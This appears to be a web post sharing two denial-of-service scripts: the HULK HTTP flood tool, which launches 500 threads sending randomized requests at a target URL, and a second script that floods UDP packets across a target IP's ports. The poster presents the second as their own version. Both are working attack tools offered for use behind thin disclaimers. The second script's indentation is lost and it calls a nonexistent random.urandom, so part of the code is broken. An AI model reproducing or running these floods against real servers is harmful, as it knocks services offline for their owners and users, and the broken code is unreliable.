HULK Python Script : Denial-of-Service (DoS) attack

hulk.py

# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re
# import json
import datetime

#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0

def inc_counter():
	global request_counter
	request_counter+=1

def set_flag(val):
	global flag
	flag=val

def set_safe():
	global safe
	safe=1
	
# generates a user agent array
def useragent_list():
	global headers_useragents
	headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
	headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
	headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
	return(headers_useragents)

# generates a referer array
def referer_list():
	global headers_referers
	headers_referers.append('http://www.google.com/?q=')
	headers_referers.append('http://www.usatoday.com/search/results?q=')
	headers_referers.append('http://engadget.search.aol.com/search?q=')
	headers_referers.append('http://' + host + '/')
	return(headers_referers)
	
#builds random ascii string
def buildblock(size):
	out_str = ''
	for i in range(0, size):
		a = random.randint(65, 90)
		out_str += chr(a)
	return(out_str)

def usage():
	print '---------------------------------------------------'
	print 'USAGE: python hulk.py <url>'
	print 'you can add "safe" after url, to autoshut after dos'
	print '---------------------------------------------------'

# def log(request):
	# global request_counter
	# print datetime.datetime.now(), 'REQUEST COUNT :', request_counter, '>>>', request.get_full_url()
	# print request.get_method()
	# print json.dumps(request.headers, indent=4, sort_keys=True)
	# print dir(request)  # list lots of other stuff in Request
	
#http request
def httpcall(url):
	useragent_list()
	referer_list()
	code=0
	if url.count("?")>0:
		param_joiner="&"
	else:
		param_joiner="?"
	request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
	request.add_header('User-Agent', random.choice(headers_useragents))
	request.add_header('Cache-Control', 'no-cache')
	request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
	request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
	request.add_header('Keep-Alive', random.randint(110,120))
	request.add_header('Connection', 'keep-alive')
	request.add_header('Host',host)
	try:
			inc_counter()
			# log(request)
			urllib2.urlopen(request)
	except urllib2.HTTPError, e:
			print e.code
			set_flag(1)
			print 'Response Code 500'
			code=500
	except urllib2.URLError, e:
			print e.reason
			sys.exit()
	# else:
			# log(request)
			# inc_counter()
			# urllib2.urlopen(request)
	return(code)		

	
#http caller thread 
class HTTPThread(threading.Thread):
	def run(self):
		try:
			while flag<2:
				code=httpcall(url)
				if (code==500) & (safe==1):
					set_flag(2)
		except Exception, ex:
			pass

# monitors http threads and counts requests
class MonitorThread(threading.Thread):
	def run(self):
		previous=request_counter
		while flag==0:
			if (previous+100<request_counter) & (previous<>request_counter):
				print "%d Requests Sent @" % (request_counter), datetime.datetime.now()
				previous=request_counter
		if flag==2:
			print "\n-- HULK Attack Finished --", datetime.datetime.now()

#execute 
if len(sys.argv) < 2:
	usage()
	sys.exit()
else:
	if sys.argv[1]=="help":
		usage()
		sys.exit()
	else:
		print "-- HULK Attack Started --", datetime.datetime.now()
		if len(sys.argv)== 3:
			if sys.argv[2]=="safe":
				set_safe()
		url = sys.argv[1]
		if url.count("/")==2:
			url = url + "/"
		m = re.search('https?\://([^/]*)/?.*', url)
		host = m.group(1)
		# print httpcall(url)
		for i in range(500):
			t = HTTPThread()
			t.start()
		t = MonitorThread()
		t.start()

#Lets import modules
import sys
import os
import time
import socket
import scapy.all as scapy
import random
import threading

#Lets start coding
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

#Lets define sock and bytes
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random.urandom(1490)
os.system("clear")
#Banner :
print('''
************************************************
* _ _ _ _ _ _ __ *
* | || | | | | | | |/ / *
* | __ | || | || ' < *
* ||||_/|___||_\ *
* *
* HTTP Unbearable Load King *
* Author: Sumalya Chatterjee *
* *
************************************************
************************************************
* *
* [!] Disclaimer : *
* 1. Don't Use For Personal Revenges *
* 2. Author Is Not Responsible For Your Jobs *
* 3. Use for learning purposes *
* 4. Does HULK suit in villain role, huh? *
************************************************
''')
#Type your ip and port number (find IP address using nslookup or any online website)
ip = input(" [+] Give HULK A Target IP : ")
port = eval(input(" [+] Starting Port NO : "))

#Lets start our attack
print(" ")
print(" That's my secret Cap, I am always angry ")
print(" " )
print(" [+] HULK is attacking server " + ip )
print (" " )
time.sleep(5)
sent = 0
try :
while True:
sock.sendto(bytes, (ip, port))
sent = sent + 1
port = port + 1
print("Sent %s packet to %s throught port:%s"%(sent,ip,port))
if port == 65534:
port = 1
except KeyboardInterrupt:
print(" ")
print("\n [-] Ctrl+C Detected.........Exiting")
print(" [-] DDOS ATTACKING STOPPED")
input("Enter To Exit")

☝️This is my version of HULK.
Check Out my other softwares : https://github.com/R3DHULK